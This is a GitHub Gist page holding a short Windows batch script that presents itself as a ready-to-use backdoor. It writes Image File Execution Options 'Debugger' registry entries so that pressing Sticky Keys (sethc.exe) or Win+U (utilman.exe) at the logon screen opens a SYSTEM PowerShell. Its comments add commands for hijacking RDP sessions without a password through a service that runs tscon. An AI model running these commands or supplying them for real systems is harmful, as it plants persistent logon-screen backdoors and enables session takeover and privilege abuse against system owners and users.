Last active
September 16, 2021 01:51
-
-
Save mgeeky/b42bd800f4b3dc93c9ead5538aef3221 to your computer and use it in GitHub Desktop.
Utilman and Sethc (Sticky keys) ready for use backdoor script. Deadly when used with "Password-less RDP Session Hijacking" trick
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| REM Backdoors sethc.exe (Sticky keys) and utilman (Win+U) in order to easily get past | |
| REM Windows logon screen (GINA). These processes will launch as SYSTEM. We can use then | |
| REM technique dubbed as "Password-less RDP Session Hijacking", by doing: | |
| REM (parameters to tscon needs to be adjusted) | |
| REM C:\> query user | |
| REM C:\> sc create sesshijack binpath= "cmd.exe /k tscon 2 /dest:console" | |
| REM C:\> net start sesshijack | |
| REM | |
| set BACKDOOR="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" | |
| REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "%BACKDOOR%" /f | |
| REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "%BACKDOOR%" /f |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment